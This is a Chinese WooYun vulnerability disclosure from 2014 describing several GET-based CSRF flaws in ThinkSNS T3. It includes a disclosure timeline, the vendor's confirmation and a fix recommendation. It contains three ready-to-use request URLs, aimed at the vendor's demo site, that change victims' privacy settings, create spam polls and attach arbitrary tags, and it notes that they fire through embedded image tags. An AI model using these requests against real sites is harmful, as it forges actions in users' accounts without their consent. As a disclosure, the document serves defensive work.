[公开漏洞]ThinkSNS多处GET型CSRF(打包)

来源:WooYun 浏览:1138次 时间:2014-05-13
做网站找雨过天晴工作室
ThinkSNS多处GET型CSRF(打包) 相关厂商: ThinkSNS 漏洞作者:我是小号 提交时间:2014-02-12 18:12 公开时间:2014-05-13 18:13 漏洞类型:CSRF 危害等级:中 自评Rank:10 漏洞状态: 厂商已经确认 漏洞来源:http://www.wooyun.org Tags标签: 无 漏洞详情 披露状态:

2014-02-12:细节已通知厂商并且等待厂商处理中
2014-02-19:厂商已经确认,细节仅向厂商公开
2014-02-22:细节向第三方安全合作伙伴开放
2014-03-01:细节向核心白帽子及相关领域专家公开
2014-03-11:细节向普通白帽子公开
2014-03-31:细节向实习白帽子公开
2014-05-13:细节向公众公开

简要描述:

ThinkSNS多处CSRF(GET型),可造成一定危害

详细说明:

就拿你们的演示站点做了测试(是T3的最新版本)

http://demo.thinksns.com/



------

ThinkSNS最新版本内对于POST请求的来源是进行了判断的

0.png



但是ThinkSNS最新版本对于POST和GET请求是不分的,而且GET请求的是可以在网站内用<img>标签发起的,将导致严重的安全问题,我就选取了一些发上来。

漏洞证明:

1)更改个人设置中的隐私设置(通过GET请求实现)

http://demo.thinksns.com/t3/index.php?app=public&mod=Account&act=doSavePrivacy&comment_weibo=1&message=1&space=1



2.png



2)发起大量垃圾投票(可刷分/通过GET请求实现):

http://demo.thinksns.com/t3/index.php?app=vote&mod=Index&act=add&date=7&opt%5B%5D=%E4%BD%A0%E5%B8%85&opt%5B%5D=%E6%88%91%E5%B8%85&title=%E7%8E%A9%E7%8E%A9&type=0



CSRF.png



3)可给任何用户加“傻X”(任意)标签,请求如下(通过GET请求实现)

http://demo.thinksns.com/t3/index.php?app=public&mod=Account&act=doSaveProfile&tag_num=5&user_tags=785





1.png

修复方案:

其实还有很多,我就不全部发上来了。所以重要的操作一定要区分POST和GET。

版权声明:转载请注明来源 我是小号@乌云 漏洞回应 厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-02-19 17:06

厂商回复:

多出细节,非常感谢!

最新状态:

暂无